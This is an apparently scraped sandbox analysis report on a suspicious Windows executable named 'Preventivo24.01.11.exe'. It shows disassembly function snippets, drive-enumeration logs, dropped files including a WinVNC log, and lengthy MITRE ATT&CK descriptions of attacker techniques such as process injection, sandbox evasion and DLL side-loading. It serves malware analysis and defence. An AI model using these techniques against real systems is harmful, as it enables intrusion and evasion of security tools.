Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 50d3dca58302f1bd676263b48b0a51e1916186e3729004668a104daa9de9d5fa
Instruction ID: 25892707b9f3e790f97897be66cf6ff1ef4042ede11b6607fe882da95d18917e
Opcode Fuzzy Hash: 50d3dca58302f1bd676263b48b0a51e1916186e3729004668a104daa9de9d5fa
Instruction Fuzzy Hash: 01C18EB1D00269DFDB14CFA8C854FAEBBB8BF49304F1041A9E505AB292DB74AD45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A0E869 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetParent.USER32(0000000F), ref: 00A0E89C

Strings

Unknown exception, xrefs: 00A0E871
C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00A0E881

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Parent
String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
API String ID: 975332729-9186675
Opcode ID: 71c3099a69719883076f283eb7de8b6b3fffc95703cb1af75087d0dfe7e13f70
Instruction ID: b7a915376856c425e26dbcf630297f2626fcdf2aa3f9576bd21a7ba511a7d933
Opcode Fuzzy Hash: 71c3099a69719883076f283eb7de8b6b3fffc95703cb1af75087d0dfe7e13f70
Instruction Fuzzy Hash: EE01E8309052CCEEDB01EBE8C9197DDBFB1AB51308F5444A8E041AB296DBF95E48D792

Uniqueness

Uniqueness Score: -1.00%

Function 009F62F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 009F6328

Strings

Unknown exception, xrefs: 009F6300
C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 009F6313

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ActiveWindow
String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
API String ID: 2558294473-2631306498
Opcode ID: 7c07aa6e3c86f55621202cb0062f9bc0a03c58fb74d1f363c691041678338ece
Instruction ID: 56945cbe4f73b4536f088aeb91635698fe626d2d69353d3ecd0c7e6844ed0d97
Opcode Fuzzy Hash: 7c07aa6e3c86f55621202cb0062f9bc0a03c58fb74d1f363c691041678338ece
Instruction Fuzzy Hash: 79F0CD30D052CCDADB06E7E8D9157DEBFB06B51344F544098E041AB2C2DBF80B08E792

Uniqueness

Uniqueness Score: -1.00%

Source: Joe Sandbox View	IP Address: 93.184.216.34 93.184.216.34
Source: Joe Sandbox View	IP Address: 93.184.216.34 93.184.216.34

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:	Jump to behavior

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Preventivo24.01.11.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Games\IDD.txt

C:\Games\WinVNC.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\22dc0223-1fa2-493b-9b30-3ddc1f4be2d9.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6304

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Windows Analysis Report
Preventivo24.01.11.exe

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre